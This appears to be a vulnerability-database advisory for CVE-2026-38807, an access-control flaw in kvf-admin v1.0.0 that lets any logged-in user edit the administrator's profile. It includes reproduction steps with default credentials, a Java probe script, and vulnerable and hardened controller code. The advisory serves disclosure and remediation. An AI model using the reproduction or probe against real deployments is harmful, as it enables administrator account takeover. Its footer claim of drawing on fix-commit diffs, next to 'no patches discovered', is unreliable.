VYPR
Unrated severity · NVD Advisory · Published May 27, 2026 · Updated May 27, 2026

CVE-2026-38807

Description

Insecure Permissions vulnerability in kvf-admin v1.0.0 allows a remote attacker to escalate privileges via the UserController.java component

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

An IDOR vulnerability in kvf-admin v1.0.0 allows authenticated low-privileged users to modify other users' profiles, leading to privilege escalation.

Vulnerability

An insecure direct object reference (IDOR) vulnerability exists in kvf-admin v1.0.0 within the UserController.java component at the POST /sys/user/updateInfo endpoint (lines 108-112). The handler requires only an authenticated session, carries no permission annotation, and performs no object ownership validation. It updates the user record identified by the submitted user.id parameter, so a caller can modify the profile of any user, including administrators [1].

Exploitation

An attacker must first authenticate as a low-privileged user (e.g., the default test account). The attacker then sends a POST request to /sys/user/updateInfo with a crafted payload containing the target user's id and the desired field changes. No additional privileges or user interaction are required beyond the initial authentication [1].

Impact

Successful exploitation enables the attacker to modify any user's profile, including the administrator account. This can result in privilege escalation (e.g., changing the admin's password or email), denial of service by locking the admin out, or full account takeover. The attacker gains the ability to alter sensitive user data without authorization [1].

Mitigation

As of the available reference, no official patch or fixed version has been released for kvf-admin v1.0.0. The vendor should implement proper permission checks (e.g., @RequiresPermissions annotations) and enforce object ownership validation in the updateInfo method. Until a fix is available, administrators should restrict access to the vulnerable endpoint or apply custom access controls [1].

AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Patches

No patches discovered yet.

Vulnerability mechanics

Root cause

"Missing object-level authorization in the profile update endpoint allows any authenticated user to modify any other user's account by supplying an arbitrary user ID."

Attack vector

An authenticated low-privileged user sends a POST request to `/sys/user/updateInfo` with a crafted `id` parameter pointing to another user (e.g., `id=1` for the admin) [ref_id=1]. The server binds the submitted form parameters—including `id`, `username`, and other profile fields—directly to a `User` object and updates the database record without verifying that the requester owns that user ID [ref_id=1]. This allows any logged-in user to overwrite the administrator's username and credentials, effectively taking over the admin account [ref_id=1].

Affected code

The vulnerable endpoint is in `UserController.java` at lines 108–112, specifically the `updateInfo` method mapped to `POST /sys/user/updateInfo` [ref_id=1]. The method accepts a `User` object directly from the HTTP request and calls `userService.updateById(user)` without any ownership or permission checks [ref_id=1].

What the fix does

No patch has been published for kvf-admin v1.0.0 [ref_id=1]. The advisory recommends three remediations: (1) do not trust client-submitted `id` fields—instead bind updates to the authenticated user identity from the server-side session/token; (2) enforce authorization checks (role-based or object-level access control) before executing `updateById`; and (3) use allowlists and separate privileged APIs for sensitive fields such as username, role, and status [ref_id=1].
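The vulnerable pattern beside a hardened version, as an added illustration that is not kvf-admin's source (the project's code is not reproduced on this page). Assumed: a Spring MVC controller, MyBatis-Plus style `userService.getById`/`updateById` calls, Apache Shiro for the session (the `@RequiresPermissions` annotation the advisory mentions is Shiro's), and all field, form and permission-string names; `User`, `UserService` and `Result` stand in for the project's own types, and the two form beans are plain getter/setter classes assumed to exist.

```java
// Added illustration, not kvf-admin's code. Assumed: Spring MVC, MyBatis-Plus
// style userService.getById/updateById, Apache Shiro session, and every field,
// form and permission-string name below. ProfileUpdateForm and AdminUserForm
// are assumed plain beans with getters/setters for the fields used here.
package example.sys;

import java.util.Objects;
import org.apache.shiro.SecurityUtils;
import org.apache.shiro.authz.annotation.RequiresPermissions;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;

@RestController
@RequestMapping("/sys/user")
public class UserProfileController {

    private final UserService userService;

    public UserProfileController(UserService userService) {
        this.userService = userService;
    }

    // BEFORE (the pattern the advisory describes): the whole User entity,
    // including id, is bound from the request and written back as-is. Any
    // authenticated caller can send id=1 and overwrite the admin record.
    @PostMapping("/updateInfoVulnerable")
    public Result updateInfoVulnerable(User user) {
        userService.updateById(user);   // trusts the client-supplied id
        return Result.ok();
    }

    // AFTER: (1) the target id comes from the server-side session, never from
    // the request; (2) only an allowlist of self-service fields is copied onto
    // the loaded entity; (3) privileged fields are handled by a separate,
    // permission-gated endpoint below.
    @PostMapping("/updateInfo")
    public Result updateInfo(ProfileUpdateForm form) {
        Long currentId = currentUserId();
        User user = userService.getById(currentId);
        if (user == null) {
            return Result.error("no such user");
        }
        // Allowlisted self-service fields only; id, username, role and
        // status are never taken from this form.
        user.setNickname(form.getNickname());
        user.setEmail(form.getEmail());
        user.setPhone(form.getPhone());
        userService.updateById(user);
        return Result.ok();
    }

    // Privileged edits: explicit permission check and an explicit target id.
    @RequiresPermissions("sys:user:edit")   // assumed permission string
    @PostMapping("/adminUpdate")
    public Result adminUpdate(AdminUserForm form) {
        User target = userService.getById(form.getId());
        if (target == null) {
            return Result.error("no such user");
        }
        target.setUsername(form.getUsername());
        target.setRoleId(form.getRoleId());
        target.setStatus(form.getStatus());
        userService.updateById(target);
        return Result.ok();
    }

    // Assumed: the principal stored at login is the User entity.
    private static Long currentUserId() {
        Object principal = SecurityUtils.getSubject().getPrincipal();
        return Objects.requireNonNull((User) principal, "not authenticated").getId();
    }
}
```

The important design choice is that the hardened `updateInfo` never reads an `id` from the request at all, so there is nothing for a client to tamper with; an ownership comparison (`form.getId().equals(currentId)`) would also work but leaves the client-supplied id in play and is easier to get wrong during later refactoring.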

Preconditions

  • auth: Attacker must have a valid authenticated session as a low-privileged user (e.g., test/123456)
  • config: The target application must be kvf-admin v1.0.0 with the vulnerable endpoint exposed
  • network: Attacker must be able to send HTTP POST requests to /sys/user/updateInfo
  • input: Attacker must supply a crafted id parameter in the request body (e.g., id=1 for admin)

Reproduction

Log in as the default low-privileged user `test/123456`. Navigate to the personal profile page and intercept the update request. Change `id=3` (the test user's ID) to `id=1` (the admin's ID) and set `username` to an arbitrary string. Send the crafted POST request to `/sys/user/updateInfo`. The admin record's username is overwritten, so the original administrator username no longer authenticates and the legitimate admin is locked out; because the same request binds the other fields of the `User` object, the attacker can set the admin record's credentials in the same way and then log in as the administrator [ref_id=1].
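The reproduction above as a scripted check, added here and not part of the advisory. It keeps the test non-destructive by touching a harmless field (`nickname`) on the admin record rather than `username`, so a positive result does not lock the administrator out. Assumed: the login form posts `username`/`password` to `/login` (path assumed, not stated on the page), the session is cookie-based, the update endpoint accepts URL-encoded form fields, and a `nickname` field exists; the base URL is a placeholder. Run it only against a disposable test instance.

```java
// Added probe, not from the advisory or from kvf-admin. Assumptions: login
// posts username/password to /login (path assumed), the session is a cookie,
// /sys/user/updateInfo accepts url-encoded fields, and a "nickname" field
// exists. Use only against a disposable test instance.
import java.net.CookieManager;
import java.net.URI;
import java.net.URLEncoder;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
import java.nio.charset.StandardCharsets;
import java.util.Map;
import java.util.stream.Collectors;

public class IdorProbe {

    // URL-encode a map as an application/x-www-form-urlencoded body.
    private static String form(Map<String, String> fields) {
        return fields.entrySet().stream()
            .map(e -> URLEncoder.encode(e.getKey(), StandardCharsets.UTF_8) + "="
                    + URLEncoder.encode(e.getValue(), StandardCharsets.UTF_8))
            .collect(Collectors.joining("&"));
    }

    private static HttpResponse<String> post(HttpClient client, String url,
                                             Map<String, String> fields) throws Exception {
        HttpRequest req = HttpRequest.newBuilder(URI.create(url))
            .header("Content-Type", "application/x-www-form-urlencoded")
            .POST(HttpRequest.BodyPublishers.ofString(form(fields)))
            .build();
        return client.send(req, HttpResponse.BodyHandlers.ofString());
    }

    public static void main(String[] args) throws Exception {
        String base = args.length > 0 ? args[0] : "http://localhost:8080"; // placeholder
        // A cookie jar so the low-privileged session carries into the second request.
        HttpClient client = HttpClient.newBuilder()
            .cookieHandler(new CookieManager())
            .build();

        // Step 1: authenticate as the default low-privileged account from the advisory.
        HttpResponse<String> login = post(client, base + "/login",
            Map.of("username", "test", "password", "123456"));
        System.out.println("login: HTTP " + login.statusCode());

        // Step 2: the "self" update with a foreign id. nickname is used instead
        // of username so the check does not lock the administrator out.
        HttpResponse<String> upd = post(client, base + "/sys/user/updateInfo",
            Map.of("id", "1", "nickname", "idor-probe"));
        System.out.println("updateInfo(id=1): HTTP " + upd.statusCode()
            + " body=" + upd.body());

        // Interpretation: a 2xx with the application's success body means the
        // endpoint accepted a write to a record this session does not own
        // (confirm by reading the admin record afterwards); a 401/403 or an
        // error body means an ownership or permission check is in place.
    }
}
```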

Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

1
